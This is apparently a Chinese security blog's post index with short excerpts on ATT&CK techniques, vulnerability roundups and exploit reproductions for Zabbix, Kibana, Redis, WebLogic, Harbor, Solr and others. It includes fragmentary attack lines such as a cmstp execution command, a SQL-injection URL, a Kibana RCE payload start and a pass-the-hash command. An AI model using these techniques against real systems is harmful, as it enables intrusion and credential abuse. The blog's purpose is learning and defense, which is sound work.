- 博客(38)
- 收藏
- 关注
RSS订阅原创 ATT & CK 阶段之Persistence -- Scheduled Task
前言在黑客攻击某台机器之后,为了防止会话中断而失去机器的控制权限,黑客常会通过计划任务的手段来维持自身的权限。在Windows系统中,常通过at;schtasks进行设置。常见攻击方式atschtaskscron缓解方式审计系统配置,禁用system权限执行计划任务授权账号管理。只允许管理员相关用户配置计划任务检测方式监控相关进程的执行和命令行参数。如win10监控svchost.exe,而更早版本的使用taskeng.exe,计划任务存储在%systemroot%\Syste
2020-05-12 16:55:38
601
1
原创 ATT & CK 阶段之Execution -- WMI
WMI简介Windows Management Instrumentation:是Windows管理功能,主要是为本地和远程访问Windows系统组件提供环境。依靠于Wmi服务进行本地或远程访问,同时需要SMB及RPCS(135端口)进行远程访问。攻击者通过WMI可以进行远程交互,用于后续渗透的信息收集或远程执行命令。缓解措施特权账号管理,防止系统账号和特权账号凭证相同用户账号管理:默认只有管理员账号才可以通过WMI远程连接。可严格控制所有用户无法通过WMI远程连接检测方式网络监控:监控使
2020-05-09 17:35:04
617
原创 ATT & CK 阶段之 Execution -- CMSTP
前言ATT&CK 阶段之Executon即执行:当黑客入侵成功之后,往往会通过一系列的命令去获取信息、创建持续性会话。本文主要讲解通过cmstp.exe命令执行,调用恶意的dll或者com脚本(sct)。这种方式可以绕过applocker或者其他白名单的防御方式以及UAC.cmstp基本命令使用cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt在cmd中执行cmstp.exe -h安装配置cmstp.e
2020-05-09 08:45:03
1531
1
原创 使用sysmon监控日志进行分析
前沿在ATT & CK分析过程中,经常会涉及到进程执行的流程分析,通过常规的工具检查有点低效,听说sysmon可以实现该功能,于是尝试安装看看sysmon安装工具下载地址:https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon下载后放置本地桌面目录,管理员启动cmd切换到本地目录,注册sysmonsysmon6...
2020-05-07 23:51:56
2746
原创 inf 格式详解
概况在ATT&CK 战术学习中,我们经常会看到使用inf安装文件进行绕过从而达到命令执行效果的情况,从网络上包括微软官方,发现对inf中涉及到的sections内容不是很完整,sections里面的条目的材料就更少了,本文简单介绍一种方法去了解inf中涉及到的sections及条目常用inf格式首先我们来看一个黑客经常利用的inf文档[version]Signature=$chi...
2020-05-07 23:28:40
3254
原创 零信任实践之单包认证(SPA)
概况随着零信任概念的越来越火热,产业界也都在考虑如何将零信任的理念落地到实践中。这其中SDP推动零信任的实践路上走出了一大步,所谓SDP又称软件定义边界,理论上来说可以替代传统的物理边界。SDP边界之间自有一套自己的认证和授权体系,与传统的通过账号密码认证不同。在这众多认证和授权体系当中,我们有必要了解一下SPA即单包认证的思路和实践SPA/PK是什么Port Knocking[PK]:字面...
2020-04-23 14:08:35
18744
3
原创 ATT & CK 阶段之Initial Access --Exploit Public-Facing Application
Exploit Public-Facing Application:即攻击对外开放的服务。这些服务通常为Web,也可能是数据库、标准服务如SMB、SSH 或者其他通过sockets能访问到的服务。可选择的攻击手法对外开放的服务主要以Web和数据库为主,针对这两种类型,可以关注owasp top 10以及CWE top 25Owasp top 10注入。如sql注入,OS注入,LDAP注...
2020-04-21 15:30:17
1574
原创 ATT & CK 阶段之 Initial Access --Drive-by Compromise
Drive-by Compromise:通过受害者正常浏览网页去获取系统控制权限的一种技术手段。既可以通过浏览器或网页直接进行攻击,也可通过网页去获取相关认证的凭证可选择的攻击手法通过前端代码注入,如JS\IFrame\CSS通过正常的广告渠道付费进行传播恶意广告内容通过网页的交互页面插入恶意代码或对象,该代码可在其他用户端展示,如评论区、公告区典型的攻击流程受害者访问一个被黑客...
2020-04-20 14:17:39
2038
原创 在线转文字工具推荐
最近工作需要,经常要用到图片转文字的功能,网上找了一波。这个在线网站还挺好用的,虽然页面有点简陋,识别精度很高修图狗:http://xiutugou.com/
2020-04-11 19:22:53
224
1
原创 burpsuite配合sqlmap自动sql注入探测
环境macbookPythonSqlmapBurp suite1.7.37一:安装sqlmapGit clone https://github.com/sqlmapproject/sqlmap.git放置在/opt/sqlmap目录Vim ~/.bash_profile添加alias sqlmap='python /opt/sqlmap/sqlmap.py’保存Source ...
2019-12-31 15:44:45
2151
原创 zabbix 漏洞收集总结
一: 弱口令/默认账号admin:zabbixAdmin:zabbixguest: 空二: sql注入(ave-2016-10134)版本2.2.x3.3.0-3.031http://192.168.239.24/latest.php?output=ajax&sid=bb3e723dc1a917a2&favobj=toggle&toggle_open_s...
2019-12-31 14:42:49
2706
原创 kibana 漏洞收集总结
一:cve-2019-7609 命令执行Kibana存在远程代码执行漏洞,影响版本为5.6.15和6.6.0之前的所有版本。拥有Kibana的Timelion模块访问权限的人可以以Kibana的运行权限执行任意代码,包括反弹shell访问http://ip:5601/app/timelion输入payload.es(*).props(label.__proto__.env.AAAA='...
2019-12-31 13:55:40
7566
原创 Elasticsearch 漏洞收集总结
一:未授权访问获取敏感信息/_cat/indices/_plugin/sql//_nodes/_search/_search?preety/_status二:目录遍历漏洞(cve-2015-3337)安装“site”功能的插件后,插件目录使用…/向上跳转,导致目录穿越漏洞,可读取任意文件。未安装site功能插件的不受影响/_cat/plugins:查看所有已安装的插件一般复现...
2019-12-31 13:12:41
7663
原创 ysoserial 动态调试
前言在尝试对cve-2018-2628反序列化漏洞做分析的时候,发现一个比较重要的概念是JRMP,而在ysoserial中已经实现了JRMP的客户端和服务端,所以想可以直接进行动态调试一下,大概了解下JRMP的机制,下面简单讲一下ysoserial的调试方法调试步骤:Cve-2018-2628需要开启JRMPListener以及JRMPClient,这里我以调试JRMPClient为例,参照...
2019-12-24 19:53:03
1489
原创 weblogic cve-2018-2628复现
前言前面有分析过cve-2017-10271的xml反序列化漏洞,这次挑了cve-2018-2628尝试着分析看看,相比较xml反序列化只要一个http包而言,T3协议的反序列化利用过程显得更加复杂一些,因此在正式分析之前,这里做个简单先把复现的过程记录一下环境被攻击机192.168.99.37Ubuntu16Vulhub攻击机Mac192.168.96.111复现步骤Ubu...
2019-12-24 16:03:17
879
转载 协议分析之python实现TCP代理
前言之前有个业务,要求拦截特定的流量,并根据其特征测试拦截效果,本身流量分析用wireshark和tcpdump就挺好用的,无奈要测试拦截效果。所以需要自己实现一下简单的代理,并对相关包自己做处理,网上找到一篇写的挺好的,防走丢,转过来保存下代码实现import socketimport sys# usage: ./proxy.py [localhost] [localport] [re...
2019-12-24 11:28:00
353
原创 图片隐藏恶意代码绕过杀软之PSImage
前言随着现在杀毒软件的不断更新和升级,如何才能把恶意代码上传到攻击者的服务器而不被杀毒软件所查杀,恐怕是黑产相关人员永远绕不过的话题。最近看到一则消息,有一款挖矿病毒【MyKingz】为了隐藏自身的恶意代码,将代码隐藏在taylor swift的图像中,以实现免杀的效果。接下来我将以实例演示,看看恶意代码是如何隐藏在图片中并进行调用的恶意代码隐藏实例及演示环境windows server ...
2019-12-24 09:57:23
2364
2
原创 invoke-PSImage.ps1源码解读
[CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Script, [Parameter(Position = 1, Mandatory = $True)] [String] $Out, ...
2019-12-23 20:34:28
620
原创 xunfeng(巡风)源码解读之vulscan
以前搭建过好几次xunfeng,也看过几次他的源码,最近团队准备做巡风的二次开发,就要再好好看下他的源码了,我们知道巡风主要有两个功能,资产发现和漏洞扫描,我主要负责漏洞扫描这块,就先简单记录下这块的大致流程一:看源码tip看源码,第一步看他的启动程序,可以看run.sh,巡风的启动程序主要就五块mongodb启动:这里mongodb可以直接用二进制文件启动,导入导出,默认启动在本地的655...
2019-12-03 15:37:32
1153
原创 weblogic cve-2017-10271 反序列化详细调试
使用cve-2017-10271的poc打,看回显包POST /wls-wsat/CoordinatorPortType11 HTTP/1.1Host: 192.168.99.37:7001Content-Type: text/xmlContent-Length: 987<?xml version="1.0"?><soapenv:Envelope xmlns:soa...
2019-12-03 15:02:21
916
原创 weblogic反序列化基本概念
如图,weblogic反序列化在利用过程中,主要考虑四个部分Deliver_way :payload通过什么方式传入服务器Payload:payload是什么格式,xml本身即为序列化对象,可直接反序列化。ysoserial生成的payload,为序列化文件Write object():若非序列化数据,则首先经过writeobject()进行序列化Readobject():反序列化数据...
2019-12-03 10:01:27
4565
原创 weblogic动态调试环境搭建
一:docker配置修改以支持远程调试Docker-compose.yml 添加8453端口,该端口会是远程调试端口Docker-compose up -d 下载并运行镜像修改weblogic配置文件以支持远程调试进入docker docker exec -it cve-2018-2628_weblogic_1 /bin/bash/root/Oracle/Middleware/user_...
2019-11-25 14:21:21
2793
原创 windows_cve_2019_0708 exp复现
环境kali 192.168.1.10安装msf cve_2019_0708 exp,下载地址链接:https://pan.baidu.com/s/1_A8AtsEalYt6q85cd5cdRw 密码:7zk6下载exp,添加到kali自带到msf中,msf首先要升级到v5以上升级命令 apt install metasploit-framework网盘中共4个文件,分别放入msf目...
2019-11-25 09:56:28
866
原创 二进制学习之narnia1
密码:narnia1:efeidiedae分析查看narnia1.c#include <stdio.h>int main(){ int (*ret)(); if(getenv("EGG")==NULL){ printf("Give me something to execute at the env-variable EGG\n"); ...
2019-10-08 14:40:29
211
原创 Harbor未授权创建管理员漏洞(CVE-2019-16097)
环境准备fofa搜索环境title="Harbor" && country=CN找到一个可用环境测试测试注册账号,填写账号信息后抓包POST /api/users HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/201001...
2019-09-30 16:31:18
2006
原创 redis4.x/5.x 基于主从复制 RCE 复现
环境准备这里我通过zoomeye找到一台服务器34.70.67.23,上面开了redis4.0.6服务准备exp 自己的vps 1.1.1.1git clone https://github.com/n0b0dyCN/redis-rogue-server编译exp.socd /root/redis/redis-rogue-server/RedisModulesSDK/expmake...
2019-09-30 15:53:09
441
原创 Linux 远程连接Windows执行命令方法总结
winexewinexe在kali里面自带,用于在linux平台连接windows机器环境要求:开启文件共享,即smb服务;禁用UAC远程限制pth-winexe -U username%password //remote_ip cmd.exe --system支持ntlm hash直接登录若报错E_md4hash wrapper called.ERROR: CreateSe...
2019-09-20 01:43:53
5816
8
原创 Redis未授权访问漏洞详解
环境搭建环境:centos7 gcc1:下载安装包wget http://download.redis.io/releases/redis-3.2.6.tar.gz2:解压安装包到指定文件tar zxvf redis-3.2.6.tar.gz -C /usr/local3:cd /usr/local/redis-3.2.64:make 进行编译5:cd src &&...
2019-09-19 15:40:08
2463
原创 centos7初始安装后配置dns与更新源与关闭防火墙
CentOS7 更新源1、备份mv /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.backup2、下载新的CentOS-Base.repo 到/etc/yum.repos.d/CentOS 6wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirro...
2019-09-18 09:10:47
358
转载 2019kali更新源
1.更新软件源sudo vim /etc/apt/sources.list2.选择比较合适的源(选择一个即可)#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free...
2019-09-06 13:52:35
25866
原创 二进制学习之narnia0
学习平台:http://overthewire.org/wargames/narnia/密码:narnia0:narnia0Cd /narnia一:分析运行 ./narnia0从提示看,要我们把val的值从0x41414141 转换成0xdead执行后会提示我们输入值,我这里输入一堆a,发现buf为24字节的a,val为a的16进制数而当输入值只有一个a时,val为0x414141...
2019-09-03 14:32:48
280
原创 Windows - Linux端口复用
Linux一:使用iptables进行端口复用,目测可以进行内外网端口绕过1.1 设置端口复用链名 testiptables -t nat -N test1.2 端口复用规则iptables -t nat -A test -p tcp -j REDIRECT --to-port 22表示该规则为流量转发到22端口1.3 设置规则生效开关信息为startiptables -A IN...
2019-09-02 18:30:59
474
原创 命令执行漏洞挖掘实例
前言这两天给公司的产品做安全测试,有个比较经典的命令执行漏洞感觉还挺有意思,写出来记录一下一: 前期判断看到这里有个网络检测,感觉就有命令执行 的漏洞,抓包就试试看输入127.0.0.1本地地址,发现能ping通发现如果命令不正确或者ip地址不存在,返回包为false。因此即使存在命令执行的漏洞也无法回显。那这里就考虑用延时判断是不是存在命令执行漏洞二:判断是否存在命令执行注入其...
2019-08-22 14:10:42
2391
原创 C--汇编对应查看方法
###一:c语言编写简单函数(function_example.c)#include <stdio.h>int static add(int a, int b){ return a+b;}int main(){ int x = 5; int y = 10; int u = add(x, y);}###二:gcc编译$ gcc -g ...
2019-08-15 14:28:07
869
原创 应急响应之ARP欺骗
###一:ARP概述ARP(Address Resolution Protocol)是地址解析协议,是一种将IP地址转化为物理地址的协议。具体来说就是将网络层地址(IP)解析为数据链路层的物理地址(一般为mac地址)。在局域网中,数据本质是根据mac地址进行传输投放。而ARP欺骗本质是利用arp协议本身机制的不完善进行攻击。###二:ARP欺骗原理比如机器A向机器B发送消息,首先查询本地的A...
2019-08-15 14:25:26
311
转载 文件上传漏洞总结
1. 概述文件上传漏洞可以说是日常渗透测试中用得最多的一个漏洞,用它获得服务器权限最快最直接。在Web程序中,经常需要用到文件上传的功能。如用户或者管理员上传图片,或者其它文件。如果没有限制上传类型或者限制不严格被绕过,就有可能造成文件上传漏洞。如果上传了可执行文件或者网页脚本,就会导致网站被控制甚至服务器沦陷。,复杂一点的情况是配合 Web Server的解析漏洞来获取控制权或结合文件包含漏洞...
2019-08-15 14:24:02
465
原创 CSRF 校验CONTENT-TYPE绕过
一:flash配合307跳转绕过利用方式:http://remote_ip/csrf/test.swf?jsonData={“status”:“0”,“roleId”:5,“name”:“csrftest_2”,“username”:“csrftest_2”,“password”:“637c3de5385ae556ac6bf955340a713f”}&php_url=http://rem...
2019-08-15 14:20:17
557
1
原创 solr远程命令执行(cve-2019-0193)
影响范围:apache solo < 8.2solr默认使用端口为8983一:获取solr索引库core的名称http://192.168.96.79:8983/solr/admin/cores查看name字段为atom二:判断该索引库是否使用dataimporthandler模块Atom为根据一找到的库名http://192.168.96.79:8983/solr/atom...
2019-08-15 14:02:32
2446
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人